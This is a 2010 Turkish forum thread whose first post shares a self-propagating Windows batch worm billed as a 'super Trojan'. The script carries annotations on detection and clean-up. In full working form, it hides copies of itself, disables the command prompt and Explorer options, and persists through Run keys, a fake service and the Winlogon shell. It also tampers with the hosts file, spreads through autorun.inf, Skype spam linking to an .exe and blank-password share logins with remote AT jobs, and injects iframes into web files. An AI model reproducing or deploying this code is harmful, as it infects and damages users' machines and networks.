
yeni çIkan sÜper bİ TrojAn (google) _kOd_...

27-07-2010 10:16
#1
kilyos06@ - ait Kullanıcı Resmi (Avatar)
REM Forum-posted self-copying Windows batch script, annotated for triage,
REM detection and clean-up.
REM NOTE(review): the page rendering has wrapped several commands across lines
REM and split some paths; the comments describe the apparent intent of each step.
@echo off & break off
:loop
REM Staging: creates "%userprofile%\tmp" and copies the running script (%0)
REM into it as Qsoft.bat. Hunt for this folder and file on affected profiles.
if not exist "%userprofile%\tmp" mkdir "%userprofile%\tmp"
copy %0 "%userprofile%\tmp\Qsoft.bat"
REM Drops two VBScript helpers: tmp.vbs shows a message box; stsyk.vbs launches
REM Qsoft.bat through Wscript.Shell with window style 0 (no visible window).
REM stsyk.vbs is written with ">>", so it grows on every pass of the loop.
echo msgbox("Visit
www.google.com.",16,"VISIT IT!") > "%userprofile%\tmp\tmp.vbs"
echo set shell = CreateObject("Wscript.Shell") >> "%userprofile%\tmp\stsyk.vbs"
echo shell.run "Qsoft.bat", 0 >> "%userprofile%\tmp\stsyk.vbs"
REM Marks the staging folder and its files hidden + system + read-only, so a
REM default Explorer view or a plain "dir" will not list them (use "dir /a").
attrib +h +s +r "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp"
attrib +h +s +r "%userprofile%\tmp\Qsoft.bat"
REM Second copy placed in system32 under a name resembling Task Manager.
copy %0 %windir%\system32\taskmgr.bat
attrib +h +s +r %windir%\system32\taskmgr.bat
REM Sets the DisableCMD policy value, which blocks the interactive command
REM prompt and hampers manual investigation on the host.
reg add HKLM\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
REM Persistence: a Run-key value named "rundll-drivers" pointing at tmp.vbs.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "rundll-drivers" /d "%userprofile%\tmp\tmp.vbs" /f
REM Explorer tampering for the current user: hide file extensions, do not show
REM hidden or protected system files, and remove Search and Folder Options so
REM the user cannot easily revert these settings. Restore them during clean-up.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v "HideFileExt" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v "Hidden" /t "REG_DWORD" /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v "NoFind" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v "NoFolderOptions" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v SuperHidden /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
REM Builds %windir%\system32\n32.reg line by line. The content describes a
REM service displayed as "Windows Network Service", with ImagePath set to the
REM staged Qsoft.bat, Start=2 (automatic) and ObjectName LocalSystem, then
REM imports the file silently with REGEDIT /S. The n32.reg file and a service
REM with that display name are both artefacts to check for.
echo "HKLM\SYSTEM\CurrentControlSet\Services\Window s network Service" >%windir%\system32\n32.reg
echo "Type"=dword:00000110 >>%windir%\system32\n32.reg
echo "Start"=dword:00000002 >>%windir%\system32\n32.reg
echo "ErrorControl"=dword:00000000 >>%windir%\system32\n32.reg
echo "ImagePath"="%userprofile%\tmp\Qsoft.bat" >>%windir%\system32\n32.reg
echo "DisplayName"="Windows Network Service" >>%windir%\system32\n32.reg
echo "ObjectName"="LocalSystem" >>%windir%\system32\n32.reg
echo "Description"="Windows Network Service" >>%windir%\system32\n32.reg
echo HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WIN DOWS_REG_SERVICE\
0000\Control >>%windir%\system32\n32.reg
echo "*NewlyCreated*"=dword:00000000 >>%windir%\system32\n32.reg
echo "ActiveService"="Windows Network Service" >>%windir%\system32\n32.reg
REGEDIT /S %windir%\system32\n32.reg


REM Writes an Internet shortcut (0110005.url) to the user's Desktop, then copies
REM it under a random "_Visit!!.url" name, into Favorites and into a new
REM "%programfiles%\Qsoft" folder. All of these are clean-up targets.
echo [InternetShortcut] > "%userprofile%\Desktop\0110005.url"
echo URL=http://www.google.com >> "%userprofile%\Desktop\0110005.url"
echo IDList= >> "%userprofile%\Desktop\0110005.url"
echo [{000214A0-0000-0000-C000-000000000046}] >> "%userprofile%\Desktop\0110005.url"
echo Prop3=19,2 >> "%userprofile%\Desktop\0110005.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\Desktop\%random%_Visit!!.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\favorites"
if not exist "%programfiles%\Qsoft" mkdir "%programfiles%\Qsoft"
copy "%userprofile%\Desktop\0110005.url" "%programfiles%\Qsoft"
REM Hosts-file tampering: appends entries that map google.com and
REM www.google.com to 216.146.36.97, redirecting name resolution for those
REM hosts. Entries are appended on every loop pass, so duplicates accumulate.
REM Detection: monitor writes to drivers\etc\hosts; remediation: remove the
REM added lines.
echo 216.146.36.97 google.com >>"%windir%\system32\drivers\etc\hosts"
echo 216.146.36.97
www.google.com >>"%windir%\system32\drivers\etc\hosts"

REM Further copies in %windir%\system32\drivers: the script as Qsoft.bat and the
REM launcher as syk.vbs, both marked hidden + system + read-only.
copy %0 %windir%\system32\drivers\Qsoft.bat
copy "%userprofile%\tmp\stsyk.vbs" %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\Qsoft.bat
REM CACLS /E /P edits the ACL so the current user has Read access only, which
REM gets in the way of deleting or overwriting the two files during clean-up.
CACLS %windir%\system32\drivers\syk.vbs /E /P %username%:R
CACLS %windir%\system32\drivers\Qsoft.bat /E /P %username%:R
REM Persistence: the Winlogon "Shell" value is extended beyond explorer.exe so
REM the launcher runs at logon. Any Shell value other than plain "explorer.exe"
REM is a strong indicator and must be reset during remediation.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,%windir%\system32\drivers\syk.vb s" /f
if exist "%userprofile%\desktop\desktop.ini" copy "%userprofile%\desktop\desktop.ini" %windir%\system32\drivers
REM Drive propagation: for every drive letter that exists, copies the script to
REM the drive root as bin.bat and writes a hidden autorun.inf that references it.
REM Mitigation: disable AutoRun/AutoPlay by policy and scan drive roots for
REM autorun.inf and bin.bat.
for %%g in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y ,z) do (
if exist %%g:\ (
copy %0 %%g:\bin.bat
echo [autorun] >%%g:\autorun.inf
echo open=bin.bat >>%%g:\autorun.inf
echo shellexecute=bin.bat >>%%g:\autorun.inf
echo shell\Explore\command=bin.bat >>%%g:\autorun.inf
echo shell\Open\command=bin.bat >>%%g:\autorun.inf
echo shell=Explore >>%%g:\autorun.inf
attrib +h +s +r %%g:\autorun.inf
attrib +h +s +r %%g:\bin.bat
)
)


REM Messaging abuse: writes %windir%\skype.vbs, which uses the Skype4COM
REM automation object to attach to the Skype client and send every contact in
REM Friends a message containing the URL shown below. That URL is an indicator
REM for proxy and DNS log searches.
echo on error resume next >>%windir%\skype.vbs
echo set Fruxr = WScript.CreateObject("Skype4COM.Skype", "Skype_") >>%windir%\skype.vbs
echo Fruxr.Client.Start() >>%windir%\skype.vbs
echo Fruxr.Attach() >>%windir%\skype.vbs
echo For Each KZN In Fruxr.Friends >>%windir%\skype.vbs
echo Fruxr.SendMessage KZN.handle,"
http://h1.ripway.com/windowsgame/svchost.exe " >>%windir%\skype.vbs
echo next >>%windir%\skype.vbs
REM Runs the helper, uses ping as a delay, terminates Skype, then deletes the
REM helper, so skype.vbs may no longer be on disk when the host is examined.
start %windir%\skype.vbs
ping localhost -n 15
tskill skype
taskkill /IM /F skype
del %windir%\skype.vbs

REM Network propagation. Host names from "net view" are collected in
REM %windir%\teest.txt; that file is itself an artefact to look for.
for /f "tokens=1 delims= " %%f in ('net view ^| find " " ') do echo %%f >>%windir%\teest.txt
for /f %%g in (%windir%\teest.txt) do (

REM Attempts connections with empty passwords for admin, administrator and the
REM current user name, including to the IPC$, admin$, print$ and c$ shares. This
REM only succeeds where accounts have blank passwords, so enforcing non-empty
REM passwords and restricting administrative shares removes this path.
REM Detection: bursts of failed logons from one workstation to many peers.
net use %%g /user:admin ""
net use %%g /user:administrator ""
net use %%g /user:%username% ""
net use %%g /user:%username% ""
net use %%g\IPC$ /user:administrator ""
net use %%g\admin$ /user:administrator ""
net use %%g\print$ /user:administrator ""
net use %%g\c$ /user:administrator ""
net use %%g\IPC$ /user:adm ""
net use %%g\admin$ /user:admin ""
net use %%g\print$ /user:admin ""
net use %%g\c$ /user:admin ""
REM Copies the script to the reachable shares as funny.bat.
copy %0 %%g\IPC$\funny.bat
copy %0 %%g\C$\funny.bat
copy %0 %%g\admin$\funny.bat
copy %0 %%g\print$\funny.bat


REM Share names of each host are collected in %windir%\input123.blp; the script
REM is copied into each share as readme.bat and <share>.bat, and AT jobs are
REM registered on the remote host for 21:00 with /EVERY:S. Review scheduled
REM tasks on peers for entries that reference these file names.
for /f "tokens=1 delims= " %%a in ('net view %%g ^| find " " ') do echo %%a >>%windir%\input123.blp
for /f %%t in (%windir%\input123.blp) do (
copy %0 %%g\%%t\readme.bat
copy %0 %%g\%%t\%%t.bat
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\Admin$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\IPC$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\%%t\readme.bat
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\C$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\print$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\admin$\funny.bat"
)

)
REM Content tampering: lists all subdirectories of the current directory into
REM %windir%\tmp.log, then appends an iframe tag to every .html, .htm and .hta
REM file found. On a machine that hosts web content this alters served pages,
REM so affected files need restoring from a known-good copy. File-integrity
REM monitoring on web roots would surface the change.
dir /s /ad /b * >%windir%\tmp.log
for /f "tokens=1-5 delims=." %%I in (%windir%\tmp.log) do (
for %%t in (%%I\*.html) do (
echo ^<iframe src="
http://google.com"^> >>%%t
)
for %%b in (%%I\*.htm) do (
echo ^<iframe src="
http://google.com"^> >>%%b
)
for %%c in (%%I\*.hta) do (
echo ^<iframe src="
http://google.com"^> >>%%c
)
del %windir%\tmp.log
REM Picks a value from 1 to 45, uses it as a ping count for a variable delay,
REM opens the URL in the default browser and jumps back to :loop, so every step
REM above repeats for as long as the process runs.
set /a ranz=%random%%%45+1
ping localhost -n %ranz%
start
http://google.com
goto loop
REM This line follows an unconditional goto. It would append a random label to
REM the script file itself, changing the file's hash between copies.
echo :%username%%random% >>%0



+Bence arşive ekleyin bi daha rastlamayabilir...



++BİR TEŞEKKÜRÜ ÇOOK GÖRMEYİN...++

27-07-2010 17:13
#2
ZiqoR - ait Kullanıcı Resmi (Avatar)
saoL ustat qüzel paylaşım
27-07-2010 17:51
#3
kilyos06@ - ait Kullanıcı Resmi (Avatar)
Alıntı:
ziqor´isimli üyeden Alıntı Mesajı göster
saoL ustat qüzel paylaşım
Evet Bu kodları bulmam uzun sürüyor o yüzden pek sık mesaj atamıyorum

Ama bulup attımmıda tam işlevini görüyor hani...

Yorumun için sağool......
28-07-2010 15:21
#4
koxpstop33 - ait Kullanıcı Resmi (Avatar)
Ne işe yarıyor bu
